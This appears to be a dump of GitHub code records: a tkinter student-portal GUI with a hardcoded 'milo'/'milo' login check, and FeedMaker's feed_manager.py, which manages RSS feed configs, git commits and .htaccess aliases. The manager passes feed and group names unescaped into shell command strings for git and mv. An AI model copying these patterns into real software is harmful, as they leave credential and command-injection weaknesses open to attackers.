'完成'\n\n@named.route('/getdata',methods=['GET','POST']) ##将数据从后端传到前端\ndef getdata():\n data = json.dumps(get_name.sett(), ensure_ascii=False)\n return data\n","repo_name":"Fly97/text","sub_path":"venv/Include/Named/flask_named.py","file_name":"flask_named.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39877174561","text":"import tkinter.messagebox\r\nfrom tkinter import *\r\nfrom tkinter import ttk\r\nfrom tkinter import messagebox\r\nfrom tkinter import scrolledtext\r\nfrom customtkinter import *\r\nfrom PIL import Image,ImageTk\r\nimport socket\r\nimport threading\r\n\r\n\r\n\r\n\r\n\r\nclass FisrtPage(Frame):\r\n def __init__(self, parent, controller):\r\n Frame.__init__(self,parent,bg=\"#333\")\r\n box = Frame(self,bg=\"#333\")\r\n\r\n label1 = Label(box, text=\"scs\", bg=\"#333\", fg=\"#fff\", font=(\"arial\", 30)).grid(row=0, column=0, columnspan=2,pady=40)\r\n\r\n admlabel = Label(box, text=\"ADM NO:\", bg=\"#333\", fg=\"#fff\", font=(\"arial\", 16)).grid(row=1, column=0)\r\n admEntry = Entry(box, font=(\"arial\", 16))\r\n admEntry.grid(row=1, column=1, pady=10)\r\n\r\n passwordlabel = Label(box, text=\"password:\", bg=\"#333\", fg=\"#fff\", font=(\"arial\", 16)).grid(row=2, column=0)\r\n passwordEntry = Entry(box, show=\".\", font=(\"arial\", 16))\r\n passwordEntry.grid(row=2, column=1, pady=10)\r\n\r\n def verify():\r\n if admEntry.get() == \"milo\" and passwordEntry.get() == \"milo\":\r\n controller.show_frame(SecondPage)\r\n else:\r\n messagebox.showinfo(\"error\",\"wrong admno or password\")\r\n loginButton = CTkButton(box, text=\"login\", font=(\"arial\", 16),command= verify).grid(row=3, column=0, columnspan=2,pady=20)\r\n\r\n admin_button = CTkButton(self,text=\"admin\",font=(\"arial\",16),height=10,width=10,command=lambda :controller.show_frame(AdminPage)).place(x=700,y=10)\r\n\r\n box.pack()\r\n\r\n\r\nclass AdminPage(Frame):\r\n def __init__(self, parent, controller):\r\n Frame.__init__(self,parent,bg=\"#fff\")\r\n box = Frame(self,bg=\"#333\")\r\n\r\n\r\n\r\n\r\n\r\n box.pack()\r\n\r\n\r\nclass SecondPage(Frame):\r\n def __init__(self, parent, controller):\r\n Frame.__init__(self,parent,bg=\"#fff\")\r\n box = Frame(self,bg=\"#333\")\r\n infotab = Frame(self,bg=\"#fff\")\r\n notification_frame= Frame(self,bg=\"#333\",height=50,width=50)\r\n\r\n l1 = CTkLabel(self, text=\"Name:\", font=(\"arial\", 16))\r\n l2 = CTkLabel(self, text=\"ADM NO:\", font=(\"arial\", 16))\r\n l3 = CTkLabel(self, text=\"Course:\", font=(\"arial\", 16))\r\n l1.place(x=10,y=140)\r\n l2.place(x=10,y=170)\r\n l3.place(x=10,y=200)\r\n\r\n global img\r\n img = PhotoImage(file=\"pictures/user.png\")\r\n img_label = CTkLabel(self, image=img,text=\"\")\r\n img_label.place(x=10,y=10)\r\n\r\n\r\n\r\n imgg = ImageTk.PhotoImage(Image.open(\"pictures/email-message-icon-4.png\").resize((50,50)))\r\n b1 = CTkButton(master=self,image =imgg,text=\"\",height=5, width=5,fg_color=\"#fff\",hover_color=\"#fff\",command=lambda:controller.show_frame(ThirdPage)).place(x=640,y=3)\r\n\r\n imgg = ImageTk.PhotoImage(Image.open(\"pictures/menu.png\").resize((30, 30)))\r\n b1 = CTkButton(master=self, image=imgg, text=\"\", height=30, width=30,fg_color=\"#fff\",hover_color=\"#fff\",command=lambda: controller.show_frame(ThirdPage)).place(x=700, y=10)\r\n\r\n imgg = ImageTk.PhotoImage(Image.open(\"pictures/more-vertical-alt.png\").resize((30, 30)))\r\n b1 = CTkButton(master=self, image=imgg, text=\"\", height=30, width=30,fg_color=\"#fff\",hover_color=\"#fff\",command=lambda: controller.show_frame(ThirdPage)).place(x=740, y=10)\r\n\r\n #b1=Button(self,image=(img),height=30,width=30)\r\n #b1.place(x=600,y=30)\r\n\r\n Listbox(notification_frame, font=(\"arial\",16),height=13,width=40).pack()\r\n CTkButton(infotab, text=\"fee statement\",font=(\"arial\", 16)).pack()\r\n CTkButton(infotab, text=\"School schedule\", font=(\"arial\",16)).pack(pady=10)\r\n CTkButton(infotab, text=\"Exams\", font=(\"arial\",16)).pack()\r\n\r\n\r\n box.pack()\r\n notification_frame.place(x=300,y=150)\r\n infotab.place(x=10,y=250)\r\n\r\n\r\n\r\nclass ThirdPage(Frame):\r\n def __init__(self, parent, controller):\r\n Frame.__init__(self,parent,bg=\"#333\")\r\n\r\n \r\n\r\n #xi= 0\r\n #yi= 0\r\n\r\n #def show_message():\r\n\r\n #u = user_entry.get()\r\n #user = Label(chat_bg,height=1,width=55,bg=\"#a6a6a6\",text= u,font=12,anchor=\"e\")\r\n #user.place(x=xi,y=yi)\r\n\r\n #if 'hello' in u:\r\n #other_user = Label(chat_bg, height=1, width=55, bg=\"#a6a6a6\", text=\"almost there\", font=12, anchor=\"w\")\r\n #other_user.place(x=xi, y=yi+25)\r\n\r\n\r\n\r\n entry_bg = Frame(self,height=50,width=500,bg=\"white\")\r\n entry_bg.place(x=299,y=448)\r\n\r\n other_info_bg = Frame(self, height=50, width=299, bg=\"green\")\r\n other_info_bg.place(x=0, y=0)\r\n\r\n global chat_bg_img\r\n chat_bg_img = ImageTk.PhotoImage(Image.open(\"pictures/original whatsapp.png\").resize((500,390)))\r\n chat_bg = Listbox(self,height=20,width=500)\r\n chat_bg.place(x=299,y=51)\r\n chat_label = Label(chat_bg,image=chat_bg_img)\r\n chat_label.pack()\r\n\r\n\r\n\r\n\r\n\r\n info_bg = Frame(self, height=50, width=500, bg=\"white\")\r\n info_bg.place(x=299, y=0)\r\n\r\n user_entry = Entry(entry_bg,width=28,font=(\"helvetica\",20))\r\n user_entry.place(x=0,y=10)\r\n\r\n\r\n\r\n\r\n #l4= Label(self,text=\"jkaf\").pack(side='left'),Label(self,text=\"mibd\").pack(side=\"left\")\r\n # img = ImageTk.PhotoImage(Image.open(\"C:/Users/mylo/Desktop/rcs project/pictures/1000011412.jpg\"))\r\n # b1=Button(self,image=(img)).pack()\r\n ljd= Button(self,text=\"send\").place(x=750,y=470)\r\n\r\n\r\n imgg = ImageTk.PhotoImage(Image.open(\"pictures/arrow-left.png\").resize((30, 30)))\r\n back_button = CTkButton(self,image=imgg, text=\"\",width=10,fg_color=\"#fff\",command=lambda:controller.show_frame(SecondPage)).grid()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nclass Application(Tk):\r\n def __init__(self,*args,**kwargs):\r\n Tk.__init__(self,*args,**kwargs)\r\n #creating window\r\n window = Frame(self)\r\n window.pack()\r\n\r\n window.grid_rowconfigure(0, minsize=500)\r\n window.grid_columnconfigure(0,minsize=800)\r\n\r\n self.frames ={}\r\n for F in(FisrtPage,SecondPage,ThirdPage,AdminPage):\r\n frame = F(window, self)\r\n self.frames[F] = frame\r\n frame.grid(row=0,column=0,sticky=\"nsew\")\r\n\r\n self.show_frame(FisrtPage)\r\n\r\n def show_frame(self, page):\r\n frame = self.frames[page]\r\n frame.tkraise()\r\n\r\n\r\napp = Application()\r\napp.mainloop()\r\n\r\n","repo_name":"Mylomj/scs","sub_path":"newnewstartpage.py","file_name":"newnewstartpage.py","file_ext":"py","file_size_in_byte":6345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"44232066672","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n\r\n\r\nimport os\r\nfrom pathlib import Path\r\nimport json\r\nimport re\r\nimport logging\r\nimport logging.config\r\nfrom datetime import datetime\r\nfrom shutil import rmtree\r\nfrom typing import List, Dict, Any, Tuple, Optional\r\nfrom functools import cmp_to_key\r\nfrom bin.run import FeedMakerRunner\r\nfrom bin.feed_maker_util import Htaccess, Process, Data, PathUtil\r\nfrom bin.problem_manager import ProblemManager\r\nfrom utils.search_manga_site import SearchManager\r\n\r\nlogging.config.fileConfig(Path(__file__).parent.parent / \"logging.conf\")\r\nLOGGER = logging.getLogger(__name__)\r\n\r\n\r\nclass FeedManager:\r\n work_dir = Path(os.environ[\"FEED_MAKER_WORK_DIR\"])\r\n public_feed_dir = Path(os.environ[\"FEED_MAKER_WWW_FEEDS_DIR\"])\r\n CONF_FILE = \"conf.json\"\r\n SITE_CONF_FILE = \"site_config.json\"\r\n\r\n def __init__(self) -> None:\r\n # group_name -> feed_title_list(name, title)\r\n self.group_name_feed_title_list_map: Dict[str, List[Dict[str, str]]] = {}\r\n # feed_name -> configuration\r\n self.feed_name_config_map: Dict[str, Any] = {}\r\n self.problem_manager = ProblemManager()\r\n self.problem_manager.load_all()\r\n\r\n def _git_add(self, feed_dir_path: Path) -> Tuple[str, Optional[str]]:\r\n feed_name = feed_dir_path.name\r\n conf_file_relative = PathUtil.convert_path_to_str(feed_dir_path)\r\n os.chdir(self.work_dir)\r\n cmd = f\"git add {conf_file_relative} && git commit -m 'add {feed_name}'\"\r\n return Process.exec_cmd(cmd, dir_path=self.work_dir)\r\n\r\n def _git_rm(self, feed_dir_path: Path) -> Tuple[str, Optional[str]]:\r\n feed_name = feed_dir_path.name\r\n conf_file_relative = PathUtil.convert_path_to_str(feed_dir_path)\r\n os.chdir(self.work_dir)\r\n cmd = f\"git rm -r {conf_file_relative} && git commit -m 'remove {feed_name}'\"\r\n return Process.exec_cmd(cmd, dir_path=self.work_dir)\r\n\r\n def _git_mv(self, feed_dir_path: Path, new_feed_dir_path: Path) -> Tuple[str, Optional[str]]:\r\n feed_dir_name = feed_dir_path.name\r\n new_feed_dir_name = new_feed_dir_path.name\r\n feed_dir_path_relative = PathUtil.convert_path_to_str(feed_dir_path)\r\n new_feed_dir_path_relative = PathUtil.convert_path_to_str(new_feed_dir_path)\r\n os.chdir(self.work_dir)\r\n cmd = f\"git mv {feed_dir_path_relative} {new_feed_dir_path_relative} && git commit -m 'rename {feed_dir_name} to {new_feed_dir_name}' || mv {feed_dir_path_relative} {new_feed_dir_path_relative}\"\r\n return Process.exec_cmd(cmd, dir_path=self.work_dir)\r\n\r\n def _read_config_file(self, feed_dir_path: Path) -> Dict[str, Any]:\r\n conf_file_path = feed_dir_path / self.CONF_FILE\r\n if conf_file_path.is_file():\r\n with conf_file_path.open('r', encoding='utf-8') as infile:\r\n line_list: List[str] = []\r\n for line in infile:\r\n line_list.append(line)\r\n json_data = json.loads(''.join(line_list))\r\n if \"configuration\" not in json_data:\r\n LOGGER.error(f\"can't find normal configuration '{PathUtil.convert_path_to_str(feed_dir_path)}'\")\r\n return {}\r\n return json_data[\"configuration\"]\r\n return {}\r\n\r\n @staticmethod\r\n def _get_title_from_configuration(configuration: Dict[str, Any], feed_name: str) -> str:\r\n if configuration and \"rss\" in configuration and \"title\" in configuration[\"rss\"]:\r\n title = configuration[\"rss\"][\"title\"].split(\"::\")[0]\r\n else:\r\n title = feed_name\r\n return title\r\n\r\n def _scan_feeds_by_group(self, group_name: str) -> None:\r\n group_dir_path = self.work_dir / group_name\r\n feed_title_list: List[Dict[str, str]] = []\r\n for path in group_dir_path.iterdir():\r\n if path.is_dir():\r\n feed_name = path.name\r\n if feed_name.startswith(\".\"):\r\n continue\r\n configuration = self._read_config_file(path)\r\n self.feed_name_config_map[feed_name] = configuration\r\n title = self._get_title_from_configuration(configuration, feed_name)\r\n feed_title_list.append({\"name\": feed_name, \"title\": title})\r\n elif path.name == self.SITE_CONF_FILE:\r\n feed_title_list.append({\"name\": path.name, \"title\": path.name})\r\n self.group_name_feed_title_list_map[group_name] = feed_title_list\r\n\r\n def scan_all_feeds(self) -> None:\r\n LOGGER.debug(\"# scan_all_feeds()\")\r\n self.feed_name_config_map.clear()\r\n self.group_name_feed_title_list_map.clear()\r\n for group_dir_path in self.work_dir.iterdir():\r\n if group_dir_path.is_dir():\r\n group_name = group_dir_path.name\r\n if group_name in (\"test\", \"logs\") or group_name.startswith(\".\"):\r\n continue\r\n self._scan_feeds_by_group(group_name)\r\n\r\n async def get_exec_result(self) -> Tuple[str, str]:\r\n LOGGER.debug(\"# get_exec_result()\")\r\n exec_result_file_path = self.work_dir / \"logs\" / \"all.log\"\r\n if exec_result_file_path.is_file():\r\n with exec_result_file_path.open('r', encoding='utf-8') as infile:\r\n return infile.read(), \"\"\r\n else:\r\n return \"\", f\"can't find such file '{PathUtil.convert_path_to_str(exec_result_file_path)}'\"\r\n\r\n async def get_problems_status_info(self) -> Tuple[Dict[str, Dict[str, Any]], str]:\r\n LOGGER.debug(\"# get_problems_status_info()\")\r\n feed_alias_status_info = self.problem_manager.get_feed_alias_status_info_map()\r\n return feed_alias_status_info, \"\"\r\n\r\n async def get_problems_progress_info(self) -> Tuple[Dict[str, Dict[str, Any]], str]:\r\n LOGGER.debug(\"# get_problems_progress_info()\")\r\n return self.problem_manager.get_feed_name_progress_info_map(), \"\"\r\n\r\n async def get_problems_public_feed_info(self) -> Tuple[Dict[str, Dict[str, Any]], str]:\r\n LOGGER.debug(\"# get_problems_public_feed_info()\")\r\n return self.problem_manager.get_feed_name_public_feed_info_map(), \"\"\r\n\r\n async def get_problems_html_info(self) -> Tuple[Dict[str, Any], str]:\r\n LOGGER.debug(\"# get_problems_html_info()\")\r\n return {\"html_file_size_map\": self.problem_manager.get_html_file_size_map(), \"html_file_with_many_image_tag_map\": self.problem_manager.get_html_file_with_many_image_tag_map(), \"html_file_without_image_tag_map\": self.problem_manager.get_html_file_without_image_tag_map(), \"html_file_image_not_found_map\": self.problem_manager.get_html_file_image_not_found_map()}, \"\"\r\n\r\n async def get_problems_element_info(self) -> Tuple[Dict[str, Any], str]:\r\n LOGGER.debug(\"# get_problems_element_info()\")\r\n return {\"feed_name_list_url_count_map\": self.problem_manager.get_feed_name_list_url_count_map(), \"element_name_count_map\": self.problem_manager.get_element_name_count_map()}, \"\"\r\n\r\n @staticmethod\r\n def _determine_keyword_in_config_item(keyword: str, config: Dict[str, Any], *args):\r\n config_item: Dict[str, Any] = config\r\n for arg in args:\r\n if arg in config_item:\r\n config_item = config_item[arg]\r\n return keyword in config_item\r\n\r\n async def search(self, keywords: str) -> Tuple[List[Dict[str, Any]], str]:\r\n LOGGER.debug(f\"# search(keywords={keywords})\")\r\n result_list: List[Dict[str, Any]] = []\r\n keyword_list = keywords.split(' ')\r\n for feed_name, config in self.feed_name_config_map.items():\r\n match_count_in_name = 0\r\n match_count_in_title = 0\r\n match_count_in_description = 0\r\n for keyword in keyword_list:\r\n if keyword in feed_name:\r\n match_count_in_name += 1\r\n if self._determine_keyword_in_config_item(keyword, config, \"rss\", \"title\"):\r\n match_count_in_title += 1\r\n if self._determine_keyword_in_config_item(keyword, config, \"rss\", \"description\"):\r\n match_count_in_description += 1\r\n\r\n if match_count_in_name == len(keyword_list) or match_count_in_title == len(keyword_list) or match_count_in_description == len(keyword_list):\r\n group_name = self.problem_manager.feed_name_group_map.get(feed_name, \"\")\r\n title = self.problem_manager.feed_name_title_map.get(feed_name, \"\")\r\n result_list.append({'group_name': group_name, 'feed_name': feed_name, 'feed_title': title})\r\n\r\n return result_list, \"\"\r\n\r\n @staticmethod\r\n def search_site(keyword: str) -> Tuple[List[Tuple[str, str]], str]:\r\n LOGGER.debug(f\"# search_site(keyword={keyword})\")\r\n search_manager = SearchManager()\r\n return search_manager.search(\"\", keyword), \"\"\r\n\r\n @staticmethod\r\n def _compare_names(x, y):\r\n if x['name'][0] == \"_\" and y['name'][0] != \"_\":\r\n return 1\r\n if x['name'][0] != \"_\" and y['name'][0] == \"_\":\r\n return -1\r\n if x['name'] < y['name']:\r\n return -1\r\n if x['name'] > y['name']:\r\n return 1\r\n return 0\r\n\r\n async def get_groups(self) -> Tuple[List[Dict[str, Any]], str]:\r\n LOGGER.debug(\"# get_groups()\")\r\n group_list: List[Dict[str, Any]] = []\r\n if self.group_name_feed_title_list_map:\r\n for group_name, feed_title_list in self.group_name_feed_title_list_map.items():\r\n group_list.append({\"name\": group_name, \"num_feeds\": len(feed_title_list)})\r\n return sorted(group_list, key=cmp_to_key(FeedManager._compare_names)), \"\"\r\n return [], \"no group list\"\r\n\r\n @staticmethod\r\n def _compare_title(x, y):\r\n if x[\"name\"][0] == \"_\" and y[\"name\"][0] != \"_\":\r\n return 1\r\n if x[\"name\"][0] != \"_\" and y[\"name\"][0] == \"_\":\r\n return -1\r\n if x[\"title\"][0] == \"_\" and y[\"title\"][0] != \"_\":\r\n return 1\r\n if x[\"title\"][0] != \"_\" and y[\"title\"][0] == \"_\":\r\n return -1\r\n if x[\"title\"] < y[\"title\"]:\r\n return -1\r\n if x[\"title\"] > y[\"title\"]:\r\n return 1\r\n return 0\r\n\r\n async def get_site_config(self, group_name: str) -> Tuple[Dict[str, str], str]:\r\n LOGGER.debug(f\"# get_site_config({group_name})\")\r\n path = self.work_dir / group_name / self.SITE_CONF_FILE\r\n if path.is_file():\r\n with path.open('r', encoding='utf-8') as infile:\r\n json_data = json.load(infile)\r\n return json_data, \"\"\r\n return {}, f\"no feed list in group '{group_name}'\"\r\n\r\n async def save_site_config(self, group_name: str, post_data: Dict[str, Any]) -> Tuple[bool, str]:\r\n LOGGER.debug(f\"# save_site_config({group_name}, {post_data})\")\r\n path = self.work_dir / group_name / self.SITE_CONF_FILE\r\n try:\r\n with path.open('w', encoding='utf-8') as outfile:\r\n outfile.write(json.dumps(post_data, indent=2, ensure_ascii=False))\r\n except IOError as e:\r\n return False, str(e)\r\n return True, \"\"\r\n\r\n async def get_feeds_by_group(self, group_name: str) -> Tuple[List[Dict[str, str]], str]:\r\n LOGGER.debug(f\"# get_feeds_by_group({group_name})\")\r\n if group_name in self.group_name_feed_title_list_map:\r\n feed_title_list = self.group_name_feed_title_list_map[group_name]\r\n return sorted(feed_title_list, key=cmp_to_key(FeedManager._compare_title)), \"\"\r\n return [], f\"no feed list in group '{group_name}'\"\r\n\r\n async def get_feed_info_by_name(self, group_name: str, feed_name: str) -> Tuple[Dict[str, Any], str]:\r\n LOGGER.debug(f\"# get_feed_info_by_name({feed_name})\")\r\n feed_dir_path = self.work_dir / group_name / feed_name\r\n list_dir_path = feed_dir_path / \"newlist\"\r\n last_collect_date = None\r\n result_list = []\r\n collection_info = {}\r\n if list_dir_path.is_dir():\r\n for list_file_path in list_dir_path.iterdir():\r\n m = re.search(r'(2\\d{3}\\d{2}\\d{2})\\.txt', list_file_path.name)\r\n if not m:\r\n continue\r\n st = list_file_path.stat()\r\n if not last_collect_date:\r\n last_collect_date = datetime.fromtimestamp(st.st_mtime)\r\n else:\r\n if last_collect_date < datetime.fromtimestamp(st.st_mtime):\r\n last_collect_date = datetime.fromtimestamp(st.st_mtime)\r\n with list_file_path.open('r', encoding='utf-8') as infile:\r\n for line in infile:\r\n link, _ = line.split(\"\\t\")\r\n result_list.append(link)\r\n result_list = Data.remove_duplicates(result_list)\r\n collection_info = {\"collect_date\": ProblemManager.convert_datetime_to_str(last_collect_date), \"count\": len(result_list)}\r\n feed_info = {\r\n \"config\": self.feed_name_config_map.get(feed_name, {}),\r\n \"collection_info\": collection_info,\r\n \"public_feed_info\": self.problem_manager.get_feed_name_public_feed_info_map().get(feed_name, {}),\r\n \"progress_info\": self.problem_manager.get_feed_name_progress_info_map().get(feed_name, {}),\r\n }\r\n return feed_info, \"\"\r\n\r\n async def save_config_file(self, group_name: str, feed_name: str, post_data: Dict[str, Any]) -> Tuple[bool, str]:\r\n LOGGER.debug(f\"# save_config_file({group_name}, {feed_name}, {post_data})\")\r\n if \"configuration\" not in post_data:\r\n return False, \"invalid configuration format (no 'configuration')\"\r\n\r\n configuration = post_data[\"configuration\"]\r\n if not (\"collection\" in configuration and \"extraction\" in configuration and \"rss\" in configuration):\r\n return False, \"invalid configuration format (no 'collection' or 'extraction' or 'rss')\"\r\n\r\n config_file_path = self.work_dir / group_name / feed_name / self.CONF_FILE\r\n config_file_path.parent.mkdir(exist_ok=True)\r\n with config_file_path.open('w', encoding='utf-8') as outfile:\r\n outfile.write(json.dumps(post_data, indent=2, ensure_ascii=False))\r\n\r\n self._git_add(config_file_path)\r\n\r\n # re-scan feeds by group\r\n self.scan_all_feeds()\r\n self.problem_manager.add_config_rss_info(config_file_path.parent)\r\n return True, \"\"\r\n\r\n def run(self, group_name: str, feed_name: str, alias: str) -> Tuple[bool, str]:\r\n LOGGER.debug(f\"# run({group_name}, {feed_name}, {alias})\")\r\n feed_dir_path = self.work_dir / group_name / feed_name\r\n conf_file_path = feed_dir_path / self.CONF_FILE\r\n with conf_file_path.open('rb') as infile:\r\n json_data = json.load(infile)\r\n if \"configuration\" in json_data:\r\n runner = FeedMakerRunner(html_archiving_period=30, list_archiving_period=7)\r\n if json_data[\"configuration\"][\"collection\"].get(\"is_completed\", False):\r\n result = runner.make_single_feed(\r\n feed_dir_path, options={\"force_collection_opt\": \"-c\"})\r\n if not result:\r\n return False, \"error in making a feed with all completed articles\"\r\n\r\n result = runner.make_single_feed(feed_dir_path, options={})\r\n if not result:\r\n return False, \"error in making a feed with recent articles\"\r\n\r\n _, error = Htaccess.get_alias(group_name, feed_name)\r\n if error:\r\n if not alias:\r\n alias = feed_name\r\n _, error = Htaccess.set_alias(group_name, feed_name, alias)\r\n if error:\r\n return False, \"error in setting alias to .htaccess\"\r\n else:\r\n return False, \"invalid format of configuration file\"\r\n\r\n self.problem_manager.update_feed_info(feed_dir_path)\r\n return True, \"\"\r\n\r\n def _remove_public_img_pdf_feed_files(self, feed_name: str) -> None:\r\n LOGGER.debug(f\"# _remove_public_img_pdf_feed_files({feed_name})\")\r\n img_dir_path = self.public_feed_dir / \"img\" / feed_name\r\n pdf_dir_path = self.public_feed_dir / \"pdf\" / feed_name\r\n feed_file_path = self.public_feed_dir / f\"{feed_name}.xml\"\r\n\r\n # remove files\r\n if img_dir_path.is_dir():\r\n LOGGER.debug(f\"deleting {img_dir_path}\")\r\n rmtree(img_dir_path)\r\n if pdf_dir_path.is_dir():\r\n LOGGER.debug(f\"deleting {pdf_dir_path}\")\r\n rmtree(pdf_dir_path)\r\n LOGGER.debug(f\"deleting {feed_file_path}\")\r\n feed_file_path.unlink(missing_ok=True)\r\n\r\n async def remove_list(self, group_name: str, feed_name: str) -> None:\r\n LOGGER.debug(f\"# remove_list({group_name}, {feed_name})\")\r\n feed_dir_path = self.work_dir / group_name / feed_name\r\n list_dir_path = feed_dir_path / \"newlist\"\r\n if list_dir_path.is_dir():\r\n rmtree(list_dir_path)\r\n\r\n async def remove_html(self, group_name: str, feed_name: str) -> None:\r\n LOGGER.debug(f\"# remove_html({group_name}, {feed_name})\")\r\n feed_dir_path = self.work_dir / group_name / feed_name\r\n html_dir_path = feed_dir_path / \"html\"\r\n if html_dir_path.is_dir():\r\n rmtree(html_dir_path)\r\n self.problem_manager.remove_html_file_in_path_from_info(\"feed_dir_path\", feed_dir_path)\r\n\r\n async def remove_html_file(self, group_name: str, feed_name: str, html_file_name: str) -> None:\r\n LOGGER.debug(f\"# remove_html_file({group_name}, {feed_name})\")\r\n html_file_path = self.work_dir / group_name / feed_name / \"html\" / html_file_name\r\n html_file_path.unlink(missing_ok=True)\r\n self.problem_manager.remove_html_file_in_path_from_info(\"file_path\", html_file_path)\r\n\r\n async def remove_public_feed(self, feed_name: str) -> None:\r\n LOGGER.debug(f\"# remove_public_feed({feed_name})\")\r\n feed_file_path = self.public_feed_dir / f\"{feed_name}.xml\"\r\n feed_file_path.unlink(missing_ok=True)\r\n self.problem_manager.remove_public_feed_info(feed_file_path)\r\n\r\n async def remove_feed(self, group_name: str, feed_name: str) -> Tuple[bool, str]:\r\n LOGGER.debug(f\"# remove_feed({group_name}, {feed_name})\")\r\n feed_dir_path = self.work_dir / group_name / feed_name\r\n conf_file_path = feed_dir_path / self.CONF_FILE\r\n if not feed_dir_path or not conf_file_path:\r\n return False, f\"can't remove feed '{PathUtil.convert_path_to_str(feed_dir_path)}'\"\r\n\r\n # remove files\r\n self._remove_public_img_pdf_feed_files(feed_name)\r\n\r\n # git rm & commit\r\n self._git_rm(feed_dir_path)\r\n\r\n # remove remainder files and directories\r\n if feed_dir_path.is_dir():\r\n rmtree(feed_dir_path)\r\n\r\n # remove alias\r\n result, _ = Htaccess.remove_alias(group_name, feed_name)\r\n if not result:\r\n return False, \"error in removing alias from .htaccess\"\r\n\r\n # re-scan feeds by group\r\n self.scan_all_feeds()\r\n self.problem_manager.update_feed_info(feed_dir_path)\r\n return True, \"\"\r\n\r\n async def remove_group(self, group_name: str) -> Tuple[bool, str]:\r\n LOGGER.debug(f\"# remove_group({group_name})\")\r\n group_dir_path = self.work_dir / group_name\r\n if not group_dir_path:\r\n return False, f\"can't remove group '{group_name}'\"\r\n\r\n # remove files\r\n for feed_dir_path in group_dir_path.iterdir():\r\n feed_name = feed_dir_path.name\r\n self._remove_public_img_pdf_feed_files(feed_name)\r\n\r\n # git rm & commit\r\n self._git_rm(group_dir_path)\r\n\r\n # remove remainder files and directories\r\n if group_dir_path.is_dir():\r\n rmtree(group_dir_path)\r\n\r\n # re-scan feeds by group\r\n self.scan_all_feeds()\r\n for feed_dir_path in group_dir_path.iterdir():\r\n self.problem_manager.remove_htaccess_info(feed_dir_path.name)\r\n self.problem_manager.remove_config_rss_info(feed_dir_path)\r\n feed_file_path = self.public_feed_dir / f\"{feed_dir_path.name}.xml\"\r\n self.problem_manager.remove_public_feed_info(feed_file_path)\r\n self.problem_manager.remove_progress_info(feed_dir_path)\r\n self.problem_manager.remove_html_file_in_path_from_info(\"feed_dir_path\", feed_dir_path)\r\n self.problem_manager.load_all_httpd_access_files()\r\n return True, \"\"\r\n\r\n async def toggle_feed(self, group_name: str, feed_name: str) -> Tuple[str, str]:\r\n LOGGER.debug(f\"# toggle_feed({group_name}, {feed_name})\")\r\n if feed_name.startswith(\"_\"):\r\n new_feed_name = feed_name[1:]\r\n else:\r\n new_feed_name = \"_\" + feed_name\r\n\r\n # rename feed directory\r\n feed_dir_path = self.work_dir / group_name / feed_name\r\n new_feed_dir_path = self.work_dir / group_name / new_feed_name\r\n if not feed_dir_path.is_dir():\r\n return \"\", f\"can't find such a directory '{PathUtil.convert_path_to_str(feed_dir_path)}'\"\r\n # git mv & commit\r\n self._git_mv(feed_dir_path, new_feed_dir_path)\r\n\r\n # re-scan feeds by group\r\n self._scan_feeds_by_group(group_name)\r\n\r\n self.problem_manager.update_feed_info(feed_dir_path)\r\n return new_feed_name, \"\"\r\n\r\n async def toggle_group(self, group_name: str) -> Tuple[str, str]:\r\n LOGGER.debug(f\"# toggle_group({group_name})\")\r\n if group_name.startswith(\"_\"):\r\n new_group_name = group_name[1:]\r\n else:\r\n new_group_name = \"_\" + group_name\r\n\r\n # rename feed directory\r\n group_dir_path = self.work_dir / group_name\r\n new_group_dir_path = self.work_dir / new_group_name\r\n if not group_dir_path.is_dir():\r\n return \"\", f\"can't find such a directory '{PathUtil.convert_path_to_str(group_dir_path)}'\"\r\n # git mv & commit\r\n self._git_mv(group_dir_path, new_group_dir_path)\r\n\r\n # re-scan feeds by group\r\n self.scan_all_feeds()\r\n if group_name.startswith(\"_\"):\r\n # enable\r\n for feed_dir_path in new_group_dir_path.iterdir():\r\n self.problem_manager.add_htaccess_info(feed_dir_path.name)\r\n self.problem_manager.add_config_rss_info(feed_dir_path)\r\n feed_file_path = self.public_feed_dir / f\"{feed_dir_path.name}.xml\"\r\n self.problem_manager.add_public_feed_info(feed_file_path)\r\n self.problem_manager.add_progress_info(feed_dir_path)\r\n self.problem_manager.add_html_info(feed_dir_path)\r\n else:\r\n # disable\r\n for feed_dir_path in group_dir_path.iterdir():\r\n self.problem_manager.remove_htaccess_info(feed_dir_path.name)\r\n self.problem_manager.remove_config_rss_info(feed_dir_path)\r\n feed_file_path = self.public_feed_dir / f\"{feed_dir_path.name}.xml\"\r\n self.problem_manager.remove_public_feed_info(feed_file_path)\r\n self.problem_manager.remove_progress_info(feed_dir_path)\r\n self.problem_manager.remove_html_file_in_path_from_info(\"feed_dir_path\", feed_dir_path)\r\n self.problem_manager.load_all_httpd_access_files()\r\n return new_group_name, \"\"\r\n\r\n @staticmethod\r\n async def get_alias(group_name: str, feed_name: str):\r\n LOGGER.debug(f\"# get_alias({group_name}, {feed_name})\")\r\n result, error = Htaccess.get_alias(group_name, feed_name)\r\n if not result:\r\n return \"\", error\r\n return result, \"\"\r\n\r\n async def remove_alias(self, group_name: str, feed_name: str):\r\n LOGGER.debug(f\"# remove_alias({group_name}, {feed_name})\")\r\n result, error = Htaccess.remove_alias(group_name, feed_name)\r\n if not result:\r\n return False, error\r\n self.problem_manager.remove_htaccess_info(feed_name)\r\n return True, \"\"\r\n\r\n async def rename_alias(self, group_name: str, feed_name: str, new_alias: str):\r\n LOGGER.debug(f\"# rename_alias({group_name}, {feed_name}, {new_alias})\")\r\n result, error = Htaccess.set_alias(group_name, feed_name, new_alias)\r\n if not result:\r\n return False, error\r\n if new_alias in self.problem_manager.feed_alias_name_map:\r\n old_feed_name = self.problem_manager.feed_alias_name_map[new_alias]\r\n self.problem_manager.remove_htaccess_info(old_feed_name)\r\n self.problem_manager.add_htaccess_info(feed_name)\r\n return True, \"\"\r\n\r\n @staticmethod\r\n async def check_running(group_name: str, feed_name: str) -> bool:\r\n # LOGGER.debug(f\"# check_running({group_name}, {feed_name})\")\r\n return FeedMakerRunner.check_running(group_name, feed_name)\r\n","repo_name":"terzeron/FeedMaker","sub_path":"backend/feed_manager.py","file_name":"feed_manager.py","file_ext":"py","file_size_in_byte":25008,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"15114234160","text":"while True:\r\n valores 